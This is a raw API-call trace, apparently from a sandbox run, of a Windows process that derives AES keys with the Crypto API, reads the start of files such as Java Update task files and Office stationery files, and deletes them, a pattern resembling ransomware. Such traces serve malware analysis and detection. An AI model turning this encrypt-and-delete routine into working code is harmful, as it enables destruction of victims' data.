GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.631] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.631] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.681] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.731] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.779] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.823] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.828] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.829] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.876] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.876] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.926] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.970] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.970] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.989] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.032] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.032] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.036] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.036] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.036] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.036] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.036] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.043] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.043] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.091] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.091] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.091] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.126] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.128] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.128] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.128] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.128] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.129] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.130] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0226.130] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0226.130] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0226.130] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0226.130] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x583 [0226.130] ReadFile (in: hFile=0x588, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0226.132] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0226.132] CryptDestroyKey (hKey=0x284d628) returned 1 [0226.132] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0226.133] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml")) returned 1 [0226.135] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0226.135] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0226.135] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0226.135] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0226.135] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x588 [0226.135] ReadFile (in: hFile=0x6a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0226.171] CryptDestroyHash (hHash=0x284d568) returned 1 [0226.171] CryptDestroyKey (hKey=0x284d628) returned 1 [0226.171] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0226.172] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml")) returned 1 [0226.174] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.174] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.265] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.329] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.330] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.513] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.564] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.564] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.618] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.618] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.650] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.651] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.651] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.651] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.681] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.732] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.733] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.780] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.781] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.823] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.831] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.881] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.881] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.881] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.965] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.965] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.982] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0226.982] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0226.983] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0226.983] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0226.983] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0226.983] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xff [0226.983] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0226.984] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0226.984] CryptDestroyKey (hKey=0x284d628) returned 1 [0226.984] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0226.985] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0 [0226.986] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0226.986] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0226.986] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0226.986] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0226.986] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x432 [0226.986] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0226.994] CryptDestroyHash (hHash=0x284d568) returned 1 [0226.994] CryptDestroyKey (hKey=0x284d628) returned 1 [0226.994] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0226.995] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0 [0226.996] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0226.996] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0226.996] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0226.996] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0226.996] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe7 [0226.996] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0226.998] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0226.998] CryptDestroyKey (hKey=0x284d628) returned 1 [0226.998] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0226.999] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0 [0226.999] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.000] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.000] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.000] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.000] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5d3f [0227.000] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.040] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.040] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.040] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.041] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0 [0227.042] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.042] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.042] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.042] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.042] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0227.042] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.044] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.044] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.044] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.045] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0 [0227.046] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.046] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.046] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.046] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.046] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1906 [0227.046] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.069] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.069] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.069] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.070] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0 [0227.071] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.072] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.072] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.072] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.072] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeb [0227.072] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.074] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.074] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.074] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.075] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0 [0227.076] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.077] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.077] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.077] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.077] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x107e [0227.077] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.080] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.080] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.080] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.082] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0 [0227.083] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.083] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.083] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.083] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.083] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0227.083] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.086] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.086] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.086] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.087] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0 [0227.088] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.089] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.089] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.089] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.089] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18ed [0227.089] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.094] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.094] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.094] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.095] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0 [0227.097] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.098] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.098] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.098] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.098] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe8 [0227.098] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.100] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.100] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.100] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.102] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0 [0227.103] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.103] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.103] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.103] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.103] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13fb [0227.103] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.107] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.107] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.107] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.109] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0 [0227.109] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.110] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.110] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.110] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.110] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0227.110] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.112] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.112] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.112] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.114] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0 [0227.115] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.116] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.116] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.116] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.116] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x780 [0227.116] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.119] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.119] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.119] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.120] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0 [0227.121] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.122] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.122] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.122] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.122] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0227.122] 